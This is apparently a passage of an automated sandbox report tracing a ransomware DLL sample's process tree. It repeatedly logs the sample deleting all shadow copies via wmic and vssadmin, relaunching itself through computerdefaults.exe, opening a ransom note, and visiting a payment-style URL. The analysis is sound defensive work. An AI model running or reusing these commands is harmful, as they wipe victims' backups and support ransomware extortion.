PID 4764 wrote to memory of 4016	4764	TextInputHost.exe	113
PID 4764 wrote to memory of 2516	4764	TextInputHost.exe	115
PID 4764 wrote to memory of 2516	4764	TextInputHost.exe	115
PID 4764 wrote to memory of 2516	4764	TextInputHost.exe	115
PID 4764 wrote to memory of 1164	4764	TextInputHost.exe	116
PID 4764 wrote to memory of 1164	4764	TextInputHost.exe	116
PID 4764 wrote to memory of 1164	4764	TextInputHost.exe	116
PID 1552 wrote to memory of 840	1552	ComputerDefaults.exe	119
PID 1552 wrote to memory of 840	1552	ComputerDefaults.exe	119
PID 4456 wrote to memory of 1632	4456	ComputerDefaults.exe	121
PID 4456 wrote to memory of 1632	4456	ComputerDefaults.exe	121
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125
PID 4268 wrote to memory of 532	4268	msedge.exe	125

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2648
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2880
- C:\Windows\system32\cmd.exe
  cmd /c "start http://78800e98f0cc24503uahnpdvb.iecard.top/uahnpdvb^&2^&42229745^&62^&319^&2219041"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2512
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://78800e98f0cc24503uahnpdvb.iecard.top/uahnpdvb&2&42229745&62&319&2219041
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0xf8,0x130,0x7ffd63e246f8,0x7ffd63e24708,0x7ffd63e24718
      4⤵
      PID:4512
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1972 /prefetch:2
      4⤵
      PID:532
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1072
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
      4⤵
      PID:3428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
      4⤵
      PID:1392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
      4⤵
      PID:5060
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
      4⤵
      PID:3756
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
      4⤵
      PID:4848
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
      4⤵
      PID:3832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
      4⤵
      PID:3000
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3536 /prefetch:8
      4⤵
      PID:1672
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3536 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4636
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
      4⤵
      PID:5336
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
      4⤵
      PID:4424
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1712 /prefetch:1
      4⤵
      PID:5924
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
      4⤵
      PID:5356
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5320 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1192
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3084
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1368
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3180
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
PID:2676
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5476
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5488
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5640
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5496
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5656

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:2808
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2524
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4240
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4760
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1632
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1852

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3472
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4028
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5972
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:5956
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4848
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:4084
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3088
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1968
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5236
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2708
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5860
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
PID:3640
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:208
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5772
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3352
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5496
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5572

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Modifies registry class
PID:3844
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5020
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2208
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3436
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3624
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2788

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
PID:3940
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3996
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1008
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4088

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:4008
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1852
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4084
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5572
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5188
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:840

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:1040

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3512
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5820
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4780
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2036
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2980
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4752

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:2292
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5876
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5868
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3404
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5852
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4036

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4764
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4016
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2516
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1164

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:1220
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1968
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2672
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4848
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:976
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3548

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2496

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2592

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5052
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4456
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1632

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1152

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5084
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1552
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:840

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1720

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3696

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5100

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5688

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5732
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5852
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5948

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5780
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5908
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6016

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6048

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5320

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5656

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1732

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4788
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3576
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2172

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5324
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5716
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5776

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4724

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5648

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4752
